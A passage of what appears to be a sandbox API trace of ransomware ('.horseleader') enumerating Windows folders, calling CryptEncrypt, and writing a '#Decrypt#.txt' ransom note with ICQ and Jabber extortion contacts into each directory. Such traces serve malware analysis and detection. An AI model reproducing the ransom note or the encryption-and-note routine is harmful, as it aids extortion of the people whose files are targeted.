lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a593198, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6a593198, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xf44c0670, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0xa9c00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ShapeCollector.exe", cAlternateFileName="")) returned 1 [0234.258] lstrcmpiW (lpString1="ShapeCollector.exe", lpString2="Windows") returned -1 [0234.258] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe") returned 73 [0234.258] StrStrIW (lpFirst="ShapeCollector.exe", lpSrch=".horseleader") returned 0x0 [0234.258] lstrcmpW (lpString1="ShapeCollector.exe", lpString2="#Decrypt#.txt") returned 1 [0234.258] lstrcmpW (lpString1="ShapeCollector.exe", lpString2="_uninstalling_.png") returned 1 [0234.258] lstrlenW (lpString=".testttjffg") returned 11 [0234.258] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe", lpSrch=".testttjffg") returned 0x0 [0234.259] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.259] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.259] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ShapeCollector.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\shapecollector.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.260] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sk-SK", cAlternateFileName="")) returned 1 [0234.260] lstrcmpiW (lpString1="sk-SK", lpString2="Windows") returned -1 [0234.260] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK") returned 60 [0234.260] lstrcmpW (lpString1="sk-SK", lpString2=".") returned 1 [0234.260] lstrcmpW (lpString1="sk-SK", lpString2="..") returned 1 [0234.260] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.260] GetProcessHeap () returned 0x780000 [0234.260] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7db828 [0234.260] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*") returned 62 [0234.260] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.261] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.261] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\.") returned 62 [0234.261] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.261] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.261] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.262] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\..") returned 63 [0234.262] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.262] lstrcmpW (lpString1="..", 
lpString2="..") returned 0 [0234.262] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.262] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.262] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui") returned 76 [0234.262] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.262] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.262] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.262] lstrlenW (lpString=".testttjffg") returned 11 [0234.262] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.262] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.263] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 
returned 0xffffffff [0234.263] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe526d67f, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe54f4dac, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe54f4dac, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.263] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.263] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\#Decrypt#.txt") returned 74 [0234.263] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.264] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.264] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.265] lstrlenA (lpString="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") returned 1368 [0234.265] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.265] CloseHandle (hObject=0x158) returned 1 [0234.266] GetProcessHeap () returned 0x780000 [0234.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.266] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sl-SI", cAlternateFileName="")) returned 1 [0234.266] lstrcmpiW (lpString1="sl-SI", lpString2="Windows") returned -1 [0234.266] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI") returned 60 [0234.266] lstrcmpW (lpString1="sl-SI", lpString2=".") returned 1 [0234.266] lstrcmpW (lpString1="sl-SI", lpString2="..") returned 1 [0234.266] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.267] GetProcessHeap () returned 0x780000 [0234.267] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, 
Size=0x840) returned 0x7db828 [0234.267] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*") returned 62 [0234.267] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.267] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.267] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\.") returned 62 [0234.267] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.268] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.268] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.268] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\..") returned 63 [0234.268] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.268] lstrcmpW (lpString1="..", lpString2="..") returned 
0 [0234.268] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.268] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.268] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui") returned 76 [0234.268] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.268] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.268] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.268] lstrlenW (lpString=".testttjffg") returned 11 [0234.269] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.269] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.269] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.269] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe92d84cc, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe94ed7e2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe94ed7e2, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.269] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.269] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\#Decrypt#.txt") returned 74 [0234.269] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sl-SI\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sl-si\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.270] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0234.270] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.271] lstrlenA (lpString="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") returned 1368 [0234.271] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.271] CloseHandle (hObject=0x158) returned 1 [0234.271] GetProcessHeap () returned 0x780000 [0234.271] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.271] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="sr-Latn-CS", cAlternateFileName="SR-LAT~1")) returned 1 [0234.271] lstrcmpiW (lpString1="sr-Latn-CS", lpString2="Windows") returned -1 [0234.271] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS") returned 65 [0234.271] lstrcmpW (lpString1="sr-Latn-CS", lpString2=".") returned 1 [0234.271] lstrcmpW (lpString1="sr-Latn-CS", lpString2="..") returned 1 [0234.272] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0234.272] GetProcessHeap () returned 0x780000 [0234.272] 
RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0234.272] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*") returned 67 [0234.272] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.272] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.272] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\.") returned 67 [0234.272] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.272] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd838dce, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd838dce, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd838dce, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.272] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.272] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\..") returned 68 [0234.272] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0234.272] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.272] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0234.272] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="Windows") returned -1 [0234.273] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui") returned 81 [0234.273] StrStrIW (lpFirst="tipresx.dll.mui", lpSrch=".horseleader") returned 0x0 [0234.273] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="#Decrypt#.txt") returned 1 [0234.273] lstrcmpW (lpString1="tipresx.dll.mui", lpString2="_uninstalling_.png") returned 1 [0234.273] lstrlenW (lpString=".testttjffg") returned 11 [0234.273] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui", lpSrch=".testttjffg") returned 0x0 [0234.273] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0234.273] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0234.273] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.273] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3f3c6a2, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe4177b15, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe4177b15, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0234.273] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.274] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\#Decrypt#.txt") returned 79 [0234.274] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sr-Latn-CS\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sr-latn-cs\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.274] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
